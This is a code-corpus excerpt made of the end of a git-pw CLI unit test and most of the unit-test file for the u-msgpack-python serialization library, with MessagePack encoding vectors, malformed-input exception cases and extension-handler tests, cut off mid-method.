assert result.exit_code == 1, result.output
assert mock_log.error.called
mock_detail.assert_called_once_with('bundles', '1')
mock_update.assert_not_called()
@mock.patch('git_pw.api.LOG')
def test_remove_api_v1_1(
self, mock_log, mock_echo, mock_detail, mock_update, mock_version,
):
"""Validate behavior with API v1.1."""
mock_version.return_value = (1, 1)
runner = CLIRunner()
result = runner.invoke(bundle.remove_cmd, ['1', '1', '2'])
assert result.exit_code == 1, result
assert mock_log.error.called
``` |
{
"source": "00-matt/u-msgpack-python",
"score": 2
} |
#### File: 00-matt/u-msgpack-python/test_umsgpack.py
```python
import sys
import struct
import unittest
import datetime
import io
from collections import OrderedDict, namedtuple
import umsgpack
single_test_vectors = [
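    # each vector is [description, unpacked value, expected packed bytes]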
# None
["nil", None, b"\xc0"],
# Booleans
["bool false", False, b"\xc2"],
["bool true", True, b"\xc3"],
# + 7-bit uint
["7-bit uint", 0x00, b"\x00"],
["7-bit uint", 0x10, b"\x10"],
["7-bit uint", 0x7f, b"\x7f"],
# - 5-bit int
["5-bit sint", -1, b"\xff"],
["5-bit sint", -16, b"\xf0"],
["5-bit sint", -32, b"\xe0"],
# 8-bit uint
["8-bit uint", 0x80, b"\xcc\x80"],
["8-bit uint", 0xf0, b"\xcc\xf0"],
["8-bit uint", 0xff, b"\xcc\xff"],
# 16-bit uint
["16-bit uint", 0x100, b"\xcd\x01\x00"],
["16-bit uint", 0x2000, b"\xcd\x20\x00"],
["16-bit uint", 0xffff, b"\xcd\xff\xff"],
# 32-bit uint
["32-bit uint", 0x10000, b"\xce\x00\x01\x00\x00"],
["32-bit uint", 0x200000, b"\xce\x00\x20\x00\x00"],
["32-bit uint", 0xffffffff, b"\xce\xff\xff\xff\xff"],
# 64-bit uint
["64-bit uint", 0x100000000, b"\xcf\x00\x00\x00\x01\x00\x00\x00\x00"],
["64-bit uint", 0x200000000000, b"\xcf\x00\x00\x20\x00\x00\x00\x00\x00"],
["64-bit uint", 0xffffffffffffffff, b"\xcf\xff\xff\xff\xff\xff\xff\xff\xff"],
# 8-bit int
["8-bit int", -33, b"\xd0\xdf"],
["8-bit int", -100, b"\xd0\x9c"],
["8-bit int", -128, b"\xd0\x80"],
# 16-bit int
["16-bit int", -129, b"\xd1\xff\x7f"],
["16-bit int", -2000, b"\xd1\xf8\x30"],
["16-bit int", -32768, b"\xd1\x80\x00"],
# 32-bit int
["32-bit int", -32769, b"\xd2\xff\xff\x7f\xff"],
["32-bit int", -1000000000, b"\xd2\xc4\x65\x36\x00"],
["32-bit int", -2147483648, b"\xd2\x80\x00\x00\x00"],
# 64-bit int
["64-bit int", -2147483649, b"\xd3\xff\xff\xff\xff\x7f\xff\xff\xff"],
["64-bit int", -1000000000000000002, b"\xd3\xf2\x1f\x49\x4c\x58\x9b\xff\xfe"],
["64-bit int", -9223372036854775808, b"\xd3\x80\x00\x00\x00\x00\x00\x00\x00"],
# 64-bit float
["64-bit float", 0.0, b"\xcb\x00\x00\x00\x00\x00\x00\x00\x00"],
["64-bit float", 2.5, b"\xcb\x40\x04\x00\x00\x00\x00\x00\x00"],
["64-bit float", float(10**35), b"\xcb\x47\x33\x42\x61\x72\xc7\x4d\x82"],
# Fixstr String
["fix string", u"", b"\xa0"],
["fix string", u"a", b"\xa1\x61"],
["fix string", u"abc", b"\xa3\x61\x62\x63"],
["fix string", u"a" * 31, b"\xbf" + b"\x61" * 31],
# 8-bit String
["8-bit string", u"b" * 32, b"\xd9\x20" + b"b" * 32],
["8-bit string", u"c" * 100, b"\xd9\x64" + b"c" * 100],
["8-bit string", u"d" * 255, b"\xd9\xff" + b"d" * 255],
# 16-bit String
["16-bit string", u"b" * 256, b"\xda\x01\x00" + b"b" * 256],
["16-bit string", u"c" * 65535, b"\xda\xff\xff" + b"c" * 65535],
# 32-bit String
["32-bit string", u"b" * 65536, b"\xdb\x00\x01\x00\x00" + b"b" * 65536],
# Wide character String
["wide char string", u"Allagbé", b"\xa8Allagb\xc3\xa9"],
["wide char string", u"По оживлённым берегам",
b"\xd9\x28\xd0\x9f\xd0\xbe\x20\xd0\xbe\xd0\xb6\xd0\xb8\xd0\xb2\xd0\xbb\xd1\x91\xd0\xbd\xd0\xbd\xd1\x8b\xd0\xbc\x20\xd0\xb1\xd0\xb5\xd1\x80\xd0\xb5\xd0\xb3\xd0\xb0\xd0\xbc"],
# 8-bit Binary
["8-bit binary", b"\x80" * 1, b"\xc4\x01" + b"\x80" * 1],
["8-bit binary", b"\x80" * 32, b"\xc4\x20" + b"\x80" * 32],
["8-bit binary", b"\x80" * 255, b"\xc4\xff" + b"\x80" * 255],
# 16-bit Binary
["16-bit binary", b"\x80" * 256, b"\xc5\x01\x00" + b"\x80" * 256],
# 32-bit Binary
["32-bit binary", b"\x80" * 65536, b"\xc6\x00\x01\x00\x00" + b"\x80" * 65536],
# Fixext 1
["fixext 1", umsgpack.Ext(0x05, b"\x80" * 1), b"\xd4\x05" + b"\x80" * 1],
# Fixext 2
["fixext 2", umsgpack.Ext(0x05, b"\x80" * 2), b"\xd5\x05" + b"\x80" * 2],
# Fixext 4
["fixext 4", umsgpack.Ext(0x05, b"\x80" * 4), b"\xd6\x05" + b"\x80" * 4],
# Fixext 8
["fixext 8", umsgpack.Ext(0x05, b"\x80" * 8), b"\xd7\x05" + b"\x80" * 8],
# Fixext 16
["fixext 16", umsgpack.Ext(0x05, b"\x80" * 16),
b"\xd8\x05" + b"\x80" * 16],
# 8-bit Ext
["8-bit ext", umsgpack.Ext(0x05, b"\x80" * 255),
b"\xc7\xff\x05" + b"\x80" * 255],
# 16-bit Ext
["16-bit ext", umsgpack.Ext(0x05, b"\x80" * 256),
b"\xc8\x01\x00\x05" + b"\x80" * 256],
# 32-bit Ext
["32-bit ext", umsgpack.Ext(0x05, b"\x80" * 65536),
b"\xc9\x00\x01\x00\x00\x05" + b"\x80" * 65536],
# Empty Array
["empty array", [], b"\x90"],
# Empty Map
["empty map", {}, b"\x80"],
# 32-bit Timestamp
["32-bit timestamp", datetime.datetime(1970, 1, 1, 0, 0, 0, 0, umsgpack._utc_tzinfo),
b"\xd6\xff\x00\x00\x00\x00"],
["32-bit timestamp", datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b"\xd6\xff\x38\x6d\xd1\x4e"],
# 64-bit Timestamp
["64-bit timestamp", datetime.datetime(2000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xd7\xff\x00\x4b\x51\x40\x38\x6d\xd1\x4e"],
["64-bit timestamp", datetime.datetime(2200, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b"\xd7\xff\x00\x00\x00\x01\xb0\x9e\xa6\xce"],
["64-bit timestamp", datetime.datetime(2200, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xd7\xff\x00\x4b\x51\x41\xb0\x9e\xa6\xce"],
# 96-bit Timestamp
["96-bit timestamp", datetime.datetime(1900, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b"\xc7\x0c\xff\x00\x00\x00\x00\xff\xff\xff\xff\x7c\x56\x0f\x4e"],
["96-bit timestamp", datetime.datetime(1900, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xc7\x0c\xff\x00\x12\xd4\x50\xff\xff\xff\xff\x7c\x56\x0f\x4e"],
["96-bit timestamp", datetime.datetime(3000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b"\xc7\x0c\xff\x00\x00\x00\x00\x00\x00\x00\x07\x91\x5f\x59\xce"],
["96-bit timestamp", datetime.datetime(3000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xc7\x0c\xff\x00\x12\xd4\x50\x00\x00\x00\x07\x91\x5f\x59\xce"],
]
composite_test_vectors = [
# Fix Array
["fix array", [5, u"abc", True],
b"\x93\x05\xa3\x61\x62\x63\xc3"],
# 16-bit Array
["16-bit array", [0x05] * 16,
b"\xdc\x00\x10" + b"\x05" * 16],
["16-bit array", [0x05] * 65535,
b"\xdc\xff\xff" + b"\x05" * 65535],
# 32-bit Array
["32-bit array", [0x05] * 65536,
b"\xdd\x00\x01\x00\x00" + b"\x05" * 65536],
# Fix Map
["fix map", OrderedDict([(1, True), (2, u"abc"), (3, b"\x80")]),
b"\x83\x01\xc3\x02\xa3\x61\x62\x63\x03\xc4\x01\x80"],
["fix map", {u"abc": 5},
b"\x81\xa3\x61\x62\x63\x05"],
["fix map", {b"\x80": 0xffff},
b"\x81\xc4\x01\x80\xcd\xff\xff"],
["fix map", {True: None},
b"\x81\xc3\xc0"],
# 16-bit Map
["16-bit map", OrderedDict([(k, 0x05) for k in range(16)]),
b"\xde\x00\x10" + b"".join([struct.pack("B", i) + b"\x05" for i in range(16)])],
["16-bit map", OrderedDict([(k, 0x05) for k in range(6000)]),
b"\xde\x17\x70" + b"".join([struct.pack("B", i) + b"\x05" for i in range(128)]) +
b"".join([b"\xcc" + struct.pack("B", i) + b"\x05" for i in range(128, 256)]) +
b"".join([b"\xcd" + struct.pack(">H", i) + b"\x05" for i in range(256, 6000)])],
# Complex Array
["complex array", [True, 0x01, umsgpack.Ext(0x03, b"foo"), 0xff,
OrderedDict([(1, False), (2, u"abc")]), b"\x80",
[1, 2, 3], u"abc"],
b"\x98\xc3\x01\xc7\x03\x03\x66\x6f\x6f\xcc\xff\x82\x01\xc2\x02\xa3\x61\x62\x63\xc4\x01\x80\x93\x01\x02\x03\xa3\x61\x62\x63"],
# Complex Map
["complex map", OrderedDict([(1, [OrderedDict([(1, 2), (3, 4)]), {}]),
(2, 1), (3, [False, u"def"]),
(4, OrderedDict([(0x100000000, u"a"),
(0xffffffff, u"b")]))]),
b"\x84\x01\x92\x82\x01\x02\x03\x04\x80\x02\x01\x03\x92\xc2\xa3\x64\x65\x66\x04\x82\xcf\x00\x00\x00\x01\x00\x00\x00\x00\xa1\x61\xce\xff\xff\xff\xff\xa1\x62"],
# Map with Tuple Keys
["map with tuple keys", OrderedDict([((u"foo", False, 3), True),
((3e6, -5), u"def")]),
b"\x82\x93\xa3\x66\x6f\x6f\xc2\x03\xc3\x92\xcb\x41\x46\xe3\x60\x00\x00\x00\x00\xfb\xa3\x64\x65\x66"],
# Map with Complex Tuple Keys
["map with complex tuple keys", {(u"foo", (1, 2, 3), 3): -5},
b"\x81\x93\xa3\x66\x6f\x6f\x93\x01\x02\x03\x03\xfb"]
]
pack_exception_test_vectors = [
# Unsupported type exception
["unsupported type", set([1, 2, 3]), umsgpack.UnsupportedTypeException],
["unsupported type", -2**(64 - 1) - 1, umsgpack.UnsupportedTypeException],
["unsupported type", 2**64, umsgpack.UnsupportedTypeException],
]
unpack_exception_test_vectors = [
# Type errors
["type error unpack unicode string", u"\x01", TypeError],
["type error unpack boolean", True, TypeError],
# Insufficient data to unpack object
["insufficient data 8-bit uint", b"\xcc",
umsgpack.InsufficientDataException],
["insufficient data 16-bit uint", b"\xcd\xff",
umsgpack.InsufficientDataException],
["insufficient data 32-bit uint", b"\xce\xff",
umsgpack.InsufficientDataException],
["insufficient data 64-bit uint", b"\xcf\xff",
umsgpack.InsufficientDataException],
["insufficient data 8-bit int", b"\xd0",
umsgpack.InsufficientDataException],
["insufficient data 16-bit int", b"\xd1\xff",
umsgpack.InsufficientDataException],
["insufficient data 32-bit int", b"\xd2\xff",
umsgpack.InsufficientDataException],
["insufficient data 64-bit int", b"\xd3\xff",
umsgpack.InsufficientDataException],
["insufficient data 32-bit float", b"\xca\xff",
umsgpack.InsufficientDataException],
["insufficient data 64-bit float", b"\xcb\xff",
umsgpack.InsufficientDataException],
["insufficient data fixstr", b"\xa1",
umsgpack.InsufficientDataException],
["insufficient data 8-bit string", b"\xd9",
umsgpack.InsufficientDataException],
["insufficient data 8-bit string", b"\xd9\x01",
umsgpack.InsufficientDataException],
["insufficient data 16-bit string", b"\xda\x01\x00",
umsgpack.InsufficientDataException],
["insufficient data 32-bit string", b"\xdb\x00\x01\x00\x00",
umsgpack.InsufficientDataException],
["insufficient data 8-bit binary", b"\xc4",
umsgpack.InsufficientDataException],
["insufficient data 8-bit binary", b"\xc4\x01",
umsgpack.InsufficientDataException],
["insufficient data 16-bit binary", b"\xc5\x01\x00",
umsgpack.InsufficientDataException],
["insufficient data 32-bit binary", b"\xc6\x00\x01\x00\x00",
umsgpack.InsufficientDataException],
["insufficient data fixarray", b"\x91",
umsgpack.InsufficientDataException],
["insufficient data fixarray", b"\x92\xc2",
umsgpack.InsufficientDataException],
["insufficient data 16-bit array", b"\xdc\x00\xf0\xc2\xc3",
umsgpack.InsufficientDataException],
["insufficient data 32-bit array", b"\xdd\x00\x01\x00\x00\xc2\xc3",
umsgpack.InsufficientDataException],
["insufficient data fixmap", b"\x81",
umsgpack.InsufficientDataException],
["insufficient data fixmap", b"\x82\xc2\xc3",
umsgpack.InsufficientDataException],
["insufficient data 16-bit map", b"\xde\x00\xf0\xc2\xc3",
umsgpack.InsufficientDataException],
["insufficient data 32-bit map", b"\xdf\x00\x01\x00\x00\xc2\xc3",
umsgpack.InsufficientDataException],
["insufficient data fixext 1", b"\xd4",
umsgpack.InsufficientDataException],
["insufficient data fixext 1", b"\xd4\x05",
umsgpack.InsufficientDataException],
["insufficient data fixext 2", b"\xd5\x05\x01",
umsgpack.InsufficientDataException],
["insufficient data fixext 4", b"\xd6\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
["insufficient data fixext 8", b"\xd7\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
["insufficient data fixext 16", b"\xd8\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
["insufficient data ext 8-bit", b"\xc7\x05\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
["insufficient data ext 16-bit", b"\xc8\x01\x00\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
["insufficient data ext 32-bit", b"\xc9\x00\x01\x00\x00\x05\x01\x02\x03",
umsgpack.InsufficientDataException],
# Unhashable key { 1 : True, { 1 : 1 } : False }
["unhashable key", b"\<KEY>",
umsgpack.UnhashableKeyException],
# Unhashable key { [ 1, 2, {} ] : True }
["unhashable key", b"\<KEY>",
umsgpack.UnhashableKeyException],
# Key duplicate { 1 : True, 1 : False }
["duplicate key", b"\<KEY>",
umsgpack.DuplicateKeyException],
# Reserved code (0xc1)
["reserved code", b"\xc1",
umsgpack.ReservedCodeException],
# Unsupported timestamp (unsupported data length)
["unsupported timestamp", b"\xc7\x02\xff\xaa\xbb",
umsgpack.UnsupportedTimestampException],
# Invalid string (non utf-8)
["invalid string", b"\xa1\x80",
umsgpack.InvalidStringException],
]
compatibility_test_vectors = [
# Fix Raw
["fix raw", b"", b"\xa0"],
["fix raw", u"", b"\xa0"],
["fix raw", b"a", b"\xa1\x61"],
["fix raw", u"a", b"\xa1\x61"],
["fix raw", b"abc", b"\xa3\x61\x62\x63"],
["fix raw", u"abc", b"\xa3\x61\x62\x63"],
["fix raw", b"a" * 31, b"\xbf" + b"\x61" * 31],
["fix raw", u"a" * 31, b"\xbf" + b"\x61" * 31],
# 16-bit Raw
["16-bit raw", u"b" * 32, b"\xda\x00\x20" + b"b" * 32],
["16-bit raw", b"b" * 32, b"\xda\x00\x20" + b"b" * 32],
["16-bit raw", u"b" * 256, b"\xda\x01\x00" + b"b" * 256],
["16-bit raw", b"b" * 256, b"\xda\x01\x00" + b"b" * 256],
["16-bit raw", u"c" * 65535, b"\xda\xff\xff" + b"c" * 65535],
["16-bit raw", b"c" * 65535, b"\xda\xff\xff" + b"c" * 65535],
# 32-bit Raw
["32-bit raw", u"b" * 65536, b"\xdb\x00\x01\x00\x00" + b"b" * 65536],
["32-bit raw", b"b" * 65536, b"\xdb\x00\x01\x00\x00" + b"b" * 65536],
]
float_precision_test_vectors = [
["float precision single", 2.5, b"\xca\x40\x20\x00\x00"],
["float precision double", 2.5, b"\xcb\x40\x04\x00\x00\x00\x00\x00\x00"],
]
tuple_test_vectors = [
["nested array", [0x01, [b"\x80", [[u"a", u"b", u"c"], True]]],
b"\x92\x01\x92\xc4\x01\x80\x92\x93\xa1a\xa1b\xa1c\xc3",
(0x01, (b"\x80", ((u"a", u"b", u"c"), True)))],
]
naive_timestamp_test_vectors = [
["32-bit timestamp (naive)", datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b"\xd6\xff\x38\x6d\xd1\x4e",
datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo)],
["64-bit timestamp (naive)", datetime.datetime(2200, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xd7\xff\x00\x4b\x51\x41\xb0\x9e\xa6\xce",
datetime.datetime(2200, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo)],
["96-bit timestamp (naive)", datetime.datetime(3000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo),
b"\xc7\x0c\xff\x00\x12\xd4\x50\x00\x00\x00\x07\x91\x5f\x59\xce",
datetime.datetime(3000, 1, 1, 10, 5, 2, 1234, umsgpack._utc_tzinfo)],
]
CustomType = namedtuple('CustomType', ['x', 'y', 'z'])
ext_handlers = {
complex: lambda obj: umsgpack.Ext(0x20, struct.pack("<ff", obj.real, obj.imag)),
CustomType: lambda obj: umsgpack.Ext(0x30, umsgpack.packb(list(obj))),
0x20: lambda ext: complex(*struct.unpack("<ff", ext.data)),
0x30: lambda ext: CustomType(*umsgpack.unpackb(ext.data)),
}
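# Hypothetical round-trip sketch (not part of the original test suite): shows
# how the ext_handlers mapping above is meant to be used with packb/unpackb.
# It is defined but never invoked, so it does not affect the tests below.
def _example_ext_handlers_round_trip():
    packed = umsgpack.packb(complex(1, 2), ext_handlers=ext_handlers)
    assert umsgpack.unpackb(packed, ext_handlers=ext_handlers) == complex(1, 2)
    packed = umsgpack.packb(CustomType(b"abc", 123, True), ext_handlers=ext_handlers)
    assert umsgpack.unpackb(packed, ext_handlers=ext_handlers) == CustomType(b"abc", 123, True)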
ext_handlers_test_vectors = [
["complex", complex(1, 2), b"\xd7\x20\x00\x00\x80\x3f\x00\x00\x00\x40"],
["custom type", CustomType(b"abc", 123, True),
b"\xd7\x30\x93\xc4\x03\x61\x62\x63\x7b\xc3"],
]
override_ext_handlers = {
datetime.datetime:
lambda obj: umsgpack.Ext(0x40, obj.strftime("%Y%m%dT%H:%M:%S.%f").encode()),
-0x01:
lambda ext: ext,
}
override_ext_handlers_test_vectors = [
["pack override",
datetime.datetime(2000, 1, 1, 10, 5, 2, 0, umsgpack._utc_tzinfo),
b'\xc7\x18@20000101T10:05:02.000000'],
["unpack override",
umsgpack.Ext(-0x01, b"\x00\xbb\xcc\xdd\x01\x02\x03\x04\x05\x06\x07\x08"),
b'\xc7\x0c\xff\x00\xbb\xcc\xdd\x01\x02\x03\x04\x05\x06\x07\x08'],
]
# These are the only global variables that should be exported by umsgpack
exported_vars_test_vector = [
"Ext",
"InvalidString",
"PackException",
"UnpackException",
"UnsupportedTypeException",
"InsufficientDataException",
"InvalidStringException",
"UnsupportedTimestampException",
"ReservedCodeException",
"UnhashableKeyException",
"DuplicateKeyException",
"KeyNotPrimitiveException",
"KeyDuplicateException",
"ext_serializable",
"pack",
"packb",
"unpack",
"unpackb",
"dump",
"dumps",
"load",
"loads",
"version",
"compatibility",
]
##########################################################################
class TestUmsgpack(unittest.TestCase):
def test_pack_single(self):
for (name, obj, data) in single_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
self.assertEqual(umsgpack.packb(obj), data)
def test_pack_composite(self):
for (name, obj, data) in composite_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
self.assertEqual(umsgpack.packb(obj), data)
def test_pack_exceptions(self):
for (name, obj, exception) in pack_exception_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
with self.assertRaises(exception):
umsgpack.packb(obj)
def test_unpack_single(self):
for (name, obj, data) in single_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
unpacked = umsgpack.unpackb(data)
# In Python2, we have both int and long integer types, but which
# one we end up with depends on the architecture (32-bit/64-bit)
if sys.version_info[0] == 2:
# Allow both {int,long} -> unpackb -> {int,long}
if isinstance(obj, int) or isinstance(obj, long):
self.assertTrue(isinstance(unpacked, int) or
isinstance(unpacked, long))
else:
self.assertTrue(isinstance(unpacked, type(obj)))
# In Python3, we only have the int integer type
else:
self.assertTrue(isinstance(unpacked, type(obj)))
self.assertEqual(unpacked, obj)
def test_unpack_composite(self):
for (name, obj, data) in composite_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
self.assertEqual(umsgpack.unpackb(data), obj)
def test_unpack_exceptions(self):
for (name, data, exception) in unpack_exception_test_vectors:
print("\tTesting {:s}".format(name))
with self.assertRaises(exception):
umsgpack.unpackb(data)
def test_pack_compatibility(self):
umsgpack.compatibility = True
for (name, obj, data) in compatibility_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
self.assertEqual(umsgpack.packb(obj), data)
umsgpack.compatibility = False
def test_unpack_compatibility(self):
umsgpack.compatibility = True
for (name, obj, data) in compatibility_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
unpacked = umsgpack.unpackb(data)
# Encoded raw should always unpack to bytes in compatibility mode,
# so convert any string obj to bytes before comparison
if sys.version_info[0] == 3 and isinstance(obj, str):
_obj = obj.encode('utf-8')
elif sys.version_info[0] == 2 and isinstance(obj, unicode):
_obj = bytes(obj)
else:
_obj = obj
self.assertTrue(isinstance(unpacked, type(_obj)))
self.assertEqual(unpacked, _obj)
umsgpack.compatibility = False
def test_unpack_invalid_string(self):
# Use last unpack exception test vector (an invalid string)
(_, data, _) = unpack_exception_test_vectors[-1]
obj = umsgpack.unpackb(data, allow_invalid_utf8=True)
self.assertTrue(isinstance(obj, umsgpack.InvalidString))
self.assertEqual(obj, b"\x80")
def test_unpack_ordered_dict(self):
# Use last composite test vector (a map)
(_, obj, data) = composite_test_vectors[-1]
# Unpack with default options (unordered dict)
unpacked = umsgpack.unpackb(data)
self.assertTrue(isinstance(unpacked, dict))
# Unpack with unordered dict
unpacked = umsgpack.unpackb(data, use_ordered_dict=False)
self.assertTrue(isinstance(unpacked, dict))
# Unpack with ordered dict
unpacked = umsgpack.unpackb(data, use_ordered_dict=True)
self.assertTrue(isinstance(unpacked, OrderedDict))
self.assertEqual(unpacked, obj)
def test_unpack_tuple(self):
# Use tuple test vector
(_, obj, data, obj_tuple) = tuple_test_vectors[0]
# Unpack with default options (list)
self.assertEqual(umsgpack.unpackb(data), obj)
# Unpack with use_tuple=False (list)
self.assertEqual(umsgpack.unpackb(data, use_tuple=False), obj)
# Unpack with use_tuple=True (tuple)
self.assertEqual(umsgpack.unpackb(data, use_tuple=True), obj_tuple)
def test_ext_exceptions(self):
        # Test invalid type for the Ext type code
with self.assertRaises(TypeError):
_ = umsgpack.Ext(5.0, b"")
# Test invalid data type
with self.assertRaises(TypeError):
_ = umsgpack.Ext(0, u"unicode string")
# Test out of range Ext type value
with self.assertRaises(ValueError):
_ = umsgpack.Ext(-129, b"data")
with self.assertRaises(ValueError):
_ = umsgpack.Ext(128, b"data")
def test_pack_ext_handler(self):
for (name, obj, data) in ext_handlers_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
packed = umsgpack.packb(obj, ext_handlers=ext_handlers)
self.assertEqual(packed, data)
def test_unpack_ext_handler(self):
for (name, obj, data) in ext_handlers_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
unpacked = umsgpack.unpackb(data, ext_handlers=ext_handlers)
self.assertEqual(unpacked, obj)
def test_pack_force_float_precision(self):
for ((name, obj, data), precision) in zip(float_precision_test_vectors, ["single", "double"]):
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
packed = umsgpack.packb(obj, force_float_precision=precision)
self.assertEqual(packed, data)
def test_pack_naive_timestamp(self):
for (name, obj, data, _) in naive_timestamp_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
packed = umsgpack.packb(obj)
self.assertEqual(packed, data)
def test_unpack_naive_timestamp(self):
for (name, _, data, obj) in naive_timestamp_test_vectors:
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
unpacked = umsgpack.unpackb(data)
self.assertEqual(unpacked, obj)
def test_pack_ext_override(self):
# Test overridden packing of datetime.datetime
(name, obj, data) = override_ext_handlers_test_vectors[0]
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
packed = umsgpack.packb(obj, ext_handlers=override_ext_handlers)
self.assertEqual(packed, data)
def test_unpack_ext_override(self):
# Test overridden unpacking of Ext type -1
(name, obj, data) = override_ext_handlers_test_vectors[1]
obj_repr = repr(obj)
print("\tTesting {:s}: object {:s}".format(
name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "..."))
unpacked = umsgpack.unpackb(data, ext_handlers=override_ext_handlers)
self.assertEqual(unpacked, obj)
def test_ext_handlers_subclass(self):
class Rectangle:
def __init__(self, length, width):
self.length = length
self.width = width
def __eq__(self, other):
return self.length == other.length and self.width == other.width
class Square(Rectangle):
def __init__(self, width):
Rectangle.__init__(self, width, width)
# Test pack (packs base class)
packed = umsgpack.packb(Square(5), ext_handlers={
Rectangle: lambda obj: umsgpack.Ext(0x10, umsgpack.packb([obj.length, obj.width])),
})
self.assertEqual(packed, b"\xc7\x03\x10\x92\x05\x05")
# Test unpack (unpacks base class)
unpacked = umsgpack.unpackb(packed, ext_handlers={
0x10: lambda ext: Rectangle(*umsgpack.unpackb(ext.data)),
})
self.assertEqual(unpacked, Rectangle(5, 5))
def test_ext_serializable(self):
# Register test class
@umsgpack.ext_serializable(0x20)
class CustomComplex:
def __init__(self, real, imag):
self.real = real
self.imag = imag
def __eq__(self, other):
return self.real == other.real and self.imag == other.imag
def packb(self):
return struct.pack("<II", self.real, self.imag)
@classmethod
def unpackb(cls, data):
return cls(*struct.unpack("<II", data))
obj, data = CustomComplex(123, 456), b"\xd7\x20\x7b\x00\x00\x00\xc8\x01\x00\x00"
# Test pack
packed = umsgpack.packb(obj)
self.assertEqual(packed, data)
# Test unpack
unpacked = umsgpack.unpackb(packed)
self.assertTrue(isinstance(unpacked, CustomComplex))
self.assertEqual(unpacked, obj)
_, obj, data = ext_handlers_test_vectors[0]
# Test pack priority of ext_handlers over ext_serializable()
packed = umsgpack.packb(obj, ext_handlers=ext_handlers)
self.assertEqual(packed, data)
# Test unpack priority of ext_handlers over ext_serializable()
unpacked = umsgpack.unpackb(data, ext_handlers=ext_handlers)
self.assertTrue(isinstance(unpacked, complex))
self.assertEqual(unpacked, obj)
# Test registration collision
with self.assertRaises(ValueError):
@umsgpack.ext_serializable(0x20)
class DummyClass:
pass
# Test out of range Ext type value
with self.assertRaises(ValueError):
@umsgpack.ext_serializable(-129)
class DummyClass2:
pass
with self.assertRaises(ValueError):
@umsgpack.ext_serializable(128)
class DummyClass3:
pass
# Register class with missing packb() and unpackb()
@umsgpack.ext_serializable(0x21)
class IncompleteClass:
pass
# Test unimplemented packb()
with self.assertRaises(NotImplementedError):
umsgpack.packb(IncompleteClass())
# Test unimplemented unpackb()
with self.assertRaises(NotImplementedError):
umsgpack.unpackb(b"\xd4\x21\x00")
# Unregister Ext serializable classes to prevent interference with
# subsequent tests
umsgpack._ext_classes_to_code = {}
umsgpack._ext_code_to_classes = {}
def test_ext_serializable_subclass(self):
@umsgpack.ext_serializable(0x10)
class Rectangle:
def __init__(self, length, width):
self.length = length
self.width = width
def __eq__(self, other):
return self.length == other.length and self.width == other.width
def packb(self):
return umsgpack.packb([self.length, self.width])
@classmethod
def unpackb(cls, data):
return cls(*umsgpack.unpackb(data))
class Square(Rectangle):
def __init__(self, width):
Rectangle.__init__(self, width, width)
# Test pack (packs base class)
packed = umsgpack.packb(Square(5))
self.assertEqual(packed, b"\xc7\x03\x10\x92\x05\x05")
# Test unpack (unpacks base class)
unpacked = umsgpack.unpackb(packed)
self.assertEqual(unpacked, Rectangle(5, 5))
# Unregister Ext serializable classes to prevent interference with
# subsequent tests
umsgpack._ext_classes_to_code = {}
umsgpack._ext_code_to_classes = {}
def test_streaming_writer(self):
# Try first composite test vector
(_, obj, data) = composite_test_vectors[0]
writer = io.BytesIO()
umsgpack.pack(obj, writer)
        self.assertEqual(writer.getvalue(), data)
def test_streaming_reader(self):
# Try first composite test vector
(_, obj, data) = composite_test_vectors[0]
reader = io.BytesIO(data)
self.assertEqual(umsgpack.unpack(reader), obj)
def test_namespacing(self):
# Get a list of global variables from umsgpack module
exported_vars = list([x for x in dir(umsgpack) if not x.startswith("_")])
# Ignore imports
